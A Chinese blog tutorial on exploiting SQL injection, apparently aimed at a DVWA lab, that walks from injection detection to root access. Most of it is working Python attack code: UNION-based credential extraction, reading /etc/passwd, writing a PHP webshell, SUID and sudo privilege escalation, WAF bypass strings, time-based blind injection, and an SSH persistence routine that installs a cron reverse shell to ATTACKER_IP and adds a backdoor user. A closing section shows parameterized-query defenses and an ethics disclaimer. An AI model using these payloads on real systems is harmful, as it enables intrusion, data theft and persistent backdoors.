SQL注入漏洞利用教程:从数据库到Root权限的奇幻之旅

最新推荐文章于 2025-10-31 16:40:54 发布
原创 最新推荐文章于 2025-10-31 16:40:54 发布 · 732 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #sql #oracle #安全 #网络安全 #系统安全 #web安全

前言:当数据库过于"诚实"时

本文章仅提供学习,切勿将其用于不法手段!

想象你是一个侦探,正在审问一个特别诚实的秘书(数据库)。无论你问什么,她都会如实回答,甚至允许你查看老板的机密文件。SQL注入就是这样一种漏洞——程序过于信任用户输入,让攻击者能够"说服"数据库执行本不该执行的命令。

第一部分:SQL注入原理解析

1.1 什么是SQL注入?

SQL注入发生在程序将用户输入直接拼接到SQL查询中:

-- 正常查询
SELECT * FROM users WHERE username = 'admin' AND password = '123456'

-- 被注入的查询
SELECT * FROM users WHERE username = 'admin' -- ' AND password = 'xxx'

注释符--使密码检查失效,直接以admin身份登录!

1.2 为什么会产生SQL注入?

漏洞根本原因是:​混淆了代码和数据的边界

// 危险代码示例
$username = $_POST['username'];
$password = $_POST['password'];
$sql = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
// 如果用户输入: admin' --
// 查询变成: SELECT * FROM users WHERE username = 'admin' -- ' AND password = ''

1.3 SQL注入的严重性

SQL注入之所以危险,是因为:

  • 直接访问数据库敏感数据
  • 可能获得文件读写权限
  • 可能执行系统命令
  • 可能成为内网渗透的跳板

第二部分:SQL注入实战利用

2.1 环境准备

使用DVWA(Damn Vulnerable Web App)进行练习:

# 启动测试环境
docker run -d -p 80:80 vulnerables/web-dvwa

访问 并登录(admin/password)

2.2 基础注入检测

#!/usr/bin/env python3
import requests
from urllib.parse import quote

def test_sql_injection(url):
    test_payloads = [
        "'",
        "''",
        "`",
        "\"",
        "--",
        "#",
        "/*",
        "*/",
        "';",
        "\";"
    ]
    
    for payload in test_payloads:
        test_url = f"{url}?id=1{payload}"
        response = requests.get(test_url)
        
        if "error" in response.text.lower() or "syntax" in response.text.lower():
            print(f"可能存在注入: {payload}")
            return True
    
    return False

# 测试目标
target_url = "http://localhost/vulnerabilities/sqli/"
test_sql_injection(target_url)

2.3 信息收集与数据库探测

def enumerate_database(url):
    # 确定数据库类型
    payloads = {
        'mysql': "' AND 1=1 UNION SELECT 1,version() -- ",
        'mssql': "' AND 1=1 UNION SELECT 1,@@version -- ",
        'oracle': "' AND 1=1 UNION SELECT 1,banner FROM v$version -- "
    }
    
    for db_type, payload in payloads.items():
        test_url = f"{url}?id=1{quote(payload)}"
        response = requests.get(test_url)
        
        if "version" in response.text or "Version" in response.text:
            print(f"数据库类型: {db_type.upper()}")
            
            # 提取版本信息
            if db_type == 'mysql':
                version_payload = "' UNION SELECT 1,version() -- "
            elif db_type == 'mssql':
                version_payload = "' UNION SELECT 1,@@version -- "
            
            version_url = f"{url}?id=1{quote(version_payload)}"
            version_response = requests.get(version_url)
            print(f"版本信息: {version_response.text}")
            return db_type
    
    return None

2.4 高级数据提取

def extract_data(url, db_type):
    # 获取数据库名
    if db_type == 'mysql':
        db_payload = "' UNION SELECT 1,database() -- "
    elif db_type == 'mssql':
        db_payload = "' UNION SELECT 1,db_name() -- "
    
    db_response = requests.get(f"{url}?id=1{quote(db_payload)}")
    db_name = extract_from_response(db_response.text)
    print(f"当前数据库: {db_name}")
    
    # 获取表名
    if db_type == 'mysql':
        tables_payload = f"' UNION SELECT 1,table_name FROM information_schema.tables WHERE table_schema='{db_name}' -- "
    elif db_type == 'mssql':
        tables_payload = f"' UNION SELECT 1,name FROM sysobjects WHERE xtype='U' -- "
    
    tables_response = requests.get(f"{url}?id=1{quote(tables_payload)}")
    tables = extract_multiple_values(tables_response.text)
    print(f"发现表: {tables}")
    
    # 获取列名(以users表为例)
    if 'users' in tables:
        if db_type == 'mysql':
            columns_payload = f"' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' -- "
        elif db_type == 'mssql':
            columns_payload = f"' UNION SELECT 1,name FROM syscolumns WHERE id=object_id('users') -- "
        
        columns_response = requests.get(f"{url}?id=1{quote(columns_payload)}")
        columns = extract_multiple_values(columns_response.text)
        print(f"users表列: {columns}")
        
        # 提取用户数据
        if 'username' in columns and 'password' in columns:
            data_payload = f"' UNION SELECT username,password FROM users -- "
            data_response = requests.get(f"{url}?id=1{quote(data_payload)}")
            credentials = extract_credentials(data_response.text)
            print(f"提取的凭据: {credentials}")
            return credentials
    
    return None

第三部分:从数据库到系统权限

3.1 文件系统访问

def read_files(url, db_type):
    if db_type == 'mysql':
        # 读取/etc/passwd
        file_payload = "' UNION SELECT 1,load_file('/etc/passwd') -- "
        file_response = requests.get(f"{url}?id=1{quote(file_payload)}")
        
        if "root:" in file_response.text:
            print("成功读取系统文件!")
            passwd_content = file_response.text
            return passwd_content
    
    return None

def write_files(url, db_type):
    if db_type == 'mysql':
        # 写入Web shell
        webshell = "<?php system($_GET['cmd']); ?>"
        write_payload = f"' UNION SELECT 1,'{webshell}' INTO OUTFILE '/var/www/html/shell.php' -- "
        
        try:
            requests.get(f"{url}?id=1{quote(write_payload)}", timeout=5)
            # 检查是否写入成功
            shell_test = requests.get("http://localhost/shell.php")
            if shell_test.status_code == 200:
                print("Webshell写入成功!")
                return True
        except:
            pass
    
    return False

3.2 命令执行与权限提升

def execute_commands(url, db_type):
    if db_type == 'mysql':
        # 利用Webshell执行命令
        cmd_url = "http://localhost/shell.php?cmd="
        
        # 检查当前用户
        whoami = requests.get(cmd_url + "whoami")
        print(f"当前用户: {whoami.text}")
        
        # 尝试提权
        # 检查sudo权限
        sudo_check = requests.get(cmd_url + "sudo+-l")
        if "may run the following" in sudo_check.text:
            print("用户有sudo权限!")
            # 尝试直接获取root
            root_shell = requests.get(cmd_url + "sudo+-i")
            if "root" in root_shell.text:
                return True
        
        # 检查SUID权限
        suid_check = requests.get(cmd_url + "find+/+-perm+-4000+-type+f+2>/dev/null")
        suid_binaries = suid_check.text.split('\n')
        
        # 检查已知可提权的SUID程序
        exploitable_binaries = ['find', 'vim', 'bash', 'nmap', 'more', 'less']
        for binary in exploitable_binaries:
            if binary in suid_binaries:
                print(f"发现可能可提权的SUID程序: {binary}")
                # 尝试利用
                if binary == 'find':
                    priv_esc = requests.get(cmd_url + "find+/dev/null+-exec+/bin/sh+\\;")
                    if "root" in priv_esc.text:
                        return True
    
    return False

3.3 横向移动与持久化

def lateral_movement(credentials):
    # 使用获取的凭据尝试SSH登录
    for username, password in credentials.items():
        try:
            import paramiko
            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            ssh.connect('localhost', username=username, password=password)
            
            print(f"成功SSH登录为 {username}")
            
            # 在系统上建立持久化
            commands = [
                "echo '反向Shell命令' >> ~/.bashrc",
                "crontab -l | { cat; echo '* * * * * /bin/bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\"'; } | crontab -",
                "useradd -m -s /bin/bash backdooruser",
                "echo 'backdooruser:password' | chpasswd"
            ]
            
            for cmd in commands:
                stdin, stdout, stderr = ssh.exec_command(cmd)
                print(f"执行: {cmd}, 输出: {stdout.read()}")
            
            ssh.close()
            return True
            
        except:
            continue
    
    return False

第四部分:高级绕过技术

4.1 WAF绕过技术

def bypass_waf(url):
    # 各种WAF绕过技巧
    bypass_techniques = [
        "/*!UNION*/SELECT",
        "UNION%0aSELECT",      # 换行符
        "UNION%0bSELECT",      # 垂直制表符
        "UNION%0cSELECT",      # 换页符
        "UNION%0dSELECT",      # 回车符
        "UNION%09SELECT",      # 水平制表符
        "UNION%a0SELECT",      # 空格变体
        "UNION/**/SELECT",      # 注释符
        "UNIÓN SELECT",        # 特殊字符
        "UNION%20ALL%20SELECT",
        "1'||'1'||'1",         # 连接符绕过
    ]
    
    for technique in bypass_techniques:
        test_url = f"{url}?id=1{quote(technique)}"
        response = requests.get(test_url)
        
        if not "blocked" in response.text and not "forbidden" in response.text:
            print(f"WAF绕过成功: {technique}")
            return technique
    
    return None

4.2 盲注与时间盲注

def blind_sql_injection(url):
    # 基于时间的盲注
    def test_blind(condition):
        time_payload = f"' AND IF({condition},SLEEP(5),0) -- "
        start_time = time.time()
        requests.get(f"{url}?id=1{quote(time_payload)}")
        end_time = time.time()
        return (end_time - start_time) > 4
    
    # 逐字符提取数据
    def extract_char(query, position):
        chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
        for char in chars:
            condition = f"SUBSTRING(({query}),{position},1)='{char}'"
            if test_blind(condition):
                return char
        return None
    
    # 提取数据库版本
    version = ""
    for i in range(1, 20):
        char = extract_char("SELECT version()", i)
        if char:
            version += char
            print(f"版本: {version}")
        else:
            break
    
    return version

第五部分:防御与深度思考

5.1 为什么SQL注入持续存在?

  1. 开发人员教育不足​:许多开发者不了解安全编码
  2. 框架误用​:即使使用安全框架,也可能错误配置
  3. 遗留系统​:大量老旧系统难以更新
  4. 复杂性​:现代应用涉及多个数据源和复杂查询

5.2 彻底防御SQL注入

# 正确的防御方法
def safe_database_query(username, password):
    # 使用参数化查询
    import sqlite3
    
    conn = sqlite3.connect('database.db')
    cursor = conn.cursor()
    
    # 安全查询 - 参数化
    cursor.execute("SELECT * FROM users WHERE username = ? AND password = ?", 
                   (username, password))
    
    results = cursor.fetchall()
    conn.close()
    return results

# 或者使用ORM
from sqlalchemy import create_engine, text
def safer_query(username, password):
    engine = create_engine('sqlite:///database.db')
    with engine.connect() as conn:
        query = text("SELECT * FROM users WHERE username = :user AND password = :pass")
        result = conn.execute(query, {"user": username, "pass": password})
        return result.fetchall()

5.3 深度防御策略

真正的安全需要多层防护:

  1. 输入验证​:白名单验证所有输入
  2. 参数化查询​:永远不要拼接SQL
  3. 最小权限​:数据库用户只拥有必要权限
  4. WAF保护​:Web应用防火墙
  5. 定期审计​:代码安全扫描和渗透测试
  6. 错误处理​:不要向用户暴露数据库错误信息

第六部分:伦理思考与责任

6.1 安全研究的道德边界

  • 授权测试​:只在获得明确授权的系统上进行
  • 负责任披露​:发现漏洞后给厂商合理时间修复
  • 教育目的​:技术知识应用于建设更安全的世界
  • 法律意识​:了解相关法律法规

6.2 SQL注入的哲学启示

SQL注入教会我们几个重要道理:

  1. 信任需要验证​:永远不要盲目信任用户输入
  2. 边界的重要性​:清晰区分代码和数据边界
  3. 深度防御​:安全需要多层次保护
  4. 持续学习​:安全威胁不断演化,需要持续学习

结语:从攻击者到防御者的思维转变

掌握SQL注入技术不是为了成为更好的攻击者,而是为了成为更优秀的防御者。真正的安全专家理解攻击技术,是为了能够设计出更安全的系统。

深度思考​:在云原生和微服务架构时代,SQL注入会以什么新的形式出现?如何在这种新环境下有效防御?

记住:最好的安全不是修复漏洞,而是从一开始就避免引入漏洞。

免责声明:本文所有技术内容仅用于教育目的和安全研究。未经授权的系统访问是违法行为。请始终在合法授权范围内进行安全测试。

sql注入详解
m0_67392811的博客
06-12 6849
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
【beescms】命令执行、报错注入
qq_51979295的博客
09-28 1137
pwn的题死活下载不下来,今天写点别的,还有点别的洞没写,改天补上
常见SQL注入攻击示例与原理及其防御措施
2301_80892630的博客
10-17 2147
SQL 注入SQL Injection)是一种代码注入技术,用于攻击数据驱动的应用程序,主要通过在输入字段或 URL 查询参数中插入恶意 SQL 语句来实现。攻击者利用应用程序对用户输入数据的未充分验证或过滤,将恶意 SQL 语句注入到后端数据库引擎执行。
SQL注入(入门)
2301_81188416的博客
02-12 3009
SQL 注入SQL Injection)是一种常见的 Web 攻击方式,攻击者通过构造恶意 SQL 语句,将其注入到应用程序中,从而操纵数据库执行非授权操作。这种攻击可能导致敏感数据泄露、数据篡改、甚至服务器被完全控制。
SQL 注入基础原理(超详细图解):零基础也能秒懂的核心逻辑
最新发布
2401_84760527的博客
10-31 991
SQL注入利用恶意SQL语句插入输入参数,绕过验证获取数据库信息。文章介绍了Web应用的三层架构(表示层、业务逻辑层、数据访问层)及SQL注入原理,通过DVWA平台演示了如何猜解数据库表名、字段和绕过登录验证。实例展示了联合查询获取数据库版本、操作系统、表结构等敏感信息,以及利用逻辑漏洞实现未授权访问。SQL注入可导致数据泄露、越权访问等严重威胁,是常见且危险的安全漏洞
对beecms网站进行SQL注入和文件上传的报告:
weixin_73760178的博客
09-11 911
在这里可能会出现解密不成功的情况,那就是有可能是该代码的字符限制在了32位,没输出完,那么我们需要使用sub是、tr截断函数进行输出。如果发现没有SQL注入的,但是又没有验证码,那么就可以进行bp的intruder部分进行暴力破解——如flyocms2.0.6。在此不好使用联合注入,因为后面的limit的限制,但从中可以看出它报错报的很详细,所以使用报错注入。是对网站进行识别(识别指纹),也就是确定此网站是php的还是什么,根据指纹查找历史漏洞。通过查找它的源码,确定它的绕过规则。
SQL注入实例
qq_56486005的博客
09-23 206
SQL 注入 首先在密码处输入报价字符 12312‘ 发现数据报错,说明可以Sql注入 pass = ‘’ or 1=1-- ’ 前面先加一个’,将程中的‘’ 闭合,“–”是注释后面的代码,加入“ or 1=1 ”使条件一定成立,使登录成功。 ...
sql注入示例
weixin_30340353的博客
11-01 169
实验指导说明 实验环境 • 实验环境 o 操作机:Windows XP o 目标机:Windows 2003 o 目标网址:www.test.ichunqiu • 实验工具: Tools Path SQLMap C:\Tools\注入工具\SQLMap 本节课程通过对SQL注入的演示,让大家了解SQL注入漏洞的方式,并学习应对此种漏洞的防御方法。 实验步骤 第一步 手工检测判断注入点 首...
Sql注入示例
我想我是海 冬天的大海 心情随风轻摆
05-19 1426
Sql注入是我们经常听说的,具体极大的风险性,下面给一个比较直观的示例
SQL注入漏洞
lin__ying的博客
01-07 1845
SQL注入漏洞是一种常见的web应用程序安全漏洞,攻击者可利用这种漏洞来篡改或绕过应用程序的身份验证和授权机制,从而访问或控制数据库中的数据。联合注入是一种常见的针对数据库注入攻击技术之一。在这个示例中,payload 是通过在输入参数中注入的,并且利用注入的查询条件来触发报错信息,以获取数据库的版本号。的SQL注入:攻击者可以利用应用程序中的时间函数,通过延长SQL查询的响应时间来推断SQL查询的结果。注入SQL注入:攻击者可以利用应用程序中的联合查询功能,通过修改查询来访问或修改数据库中的数据。
sql注入漏洞和实验
2303_81447649的博客
02-29 1724
发现不管输入什么都不管用了这个时候布尔盲注就不适合我们了,布尔盲注对于页面的正确和错误有不同的回显,如果页面一直没有变化我们就可以用时间盲注其实时间盲注和布尔盲注没有多大的差别,时间盲注多了if和sleep()函数。在将数据存入到了数据库中之后,开发者就认为数据是可信的,在下一次需要进行查询的时候,直接从数据库中取出了恶意数据,没有进行进一步的检验和处理,就会造成二次注入SQL注入攻击的本质,服务器没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全
漏洞之王SQL注入漏洞详解
为安全而生,分享各类网络攻击及其应对方法
12-06 1248
SQL注入漏洞网络安全领域中非常严重的问题,攻击者可利用漏洞获取、篡改或删除数据库中的数据。为防止SQL注入攻击,应对用户输入的数据进行严格的验证,采用参数化查询、存储过程等安全编程技术,并遵循最小权限原则。此外,部署WAF和定期进行安全审计也是防御SQL注入的重要手段。只有通过多层次的防御策略,才能有效保护Web应用程序和数据库免受SQL注入攻击的威胁。
SQL 注入漏洞原理以及修复方法_sql注入漏洞
2401_84969310的博客
05-13 2005
注:把magic_quotes_gpc选项打开,在这种情况下所有的客户端GET和POST的数据都会自动进行addslashes处理,所以此时对字符串值的SQL注入是不可行的,但要防止对数字值的SQL注入,如用intval()等函数进行处理。(2)Admin’ - -(或‘ or 1=1 or ‘ - -)(admin or 1=1 --) (MS SQL)(直接输入用户名,不进行密码验证)(3)用户名输入:admin 密码输入:’ or ‘1’=’1 也可以。
墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)
Lollipop_zhi的博客
02-26 2422
1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak 显示异常,有注入点 3.尝试简单使用order by 猜解列名数量,不成功 order by 之后我才判断了单引号闭合,也就是id=tingjigon
sql注入实例
weixin_50205723的博客
09-12 428
一、判断注入点(靶机示例) 点击一篇文章寻找注入注入点测试: 确定可以注入 二、使用sqlmap进行注入 1、打开sqlmap输入sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3093” -dbs 得到库 2、根据网页显示为软件学院我们选择rjxy进行库破解输入sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3093” -D rjxy
SQL注入示例
wake_alone
05-29 799
func queryTestXCdata(xcdata XCDataStu) (string, int) { result := make([]XCDataStu, 0) var querySql string querySql = "SELECT * FROM xc_Data" if xcdata.Id &gt; 0 { querySql = querySql + " where i...
SQL注入的简单例子
Caisi的博客
08-27 1519
动态拼接SQL语句导致SQL注入直接在SQL查询语句拼接查询参数一种解决示例:使用列表/元组传入参数 直接在SQL查询语句拼接查询参数 def getUsers(user_id): conn = psycopg2.connect("dbname='demo1' user='postgres' host='127.0.0.1' password='admin'") cur = conn.cursor() if user_id == None: str = 'select
SQL注入
WindRunnerMax
03-05 1850
SQL注入 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句添加额外的SQL语句,从而实现非法操作,获取数据库数据,服务器提权等,很多机构将SQL注入作为第一危险的安全漏洞。 原理 SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。简单的说就是在post/get表单、输入域名或页面请求...
Sql注入
qq_46540840的博客
03-11 465
目录引言类型:工具:常用方式数据库一些函数和绕过方式(待补充)函数绕过方式数字字符注入[判断标准][1]第二种方法是使用Sqlmap 这里很是方便Bool 盲注法一 : 用bp 半自动化注入法二: 用py脚本实现注入Sql 注入用法一用法二用法三 引言 Sql注入漏洞是攻击者通过任意构造sql语句对网页数据库进行任意操作(增删改查) 这里讲述sql注入入门基础. 类型: 1. 数字型注入 2. 字符型注入 3. 布尔注入 4. 报错注入 5. Cookie注入 6. 还有一些头部注入 工具:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值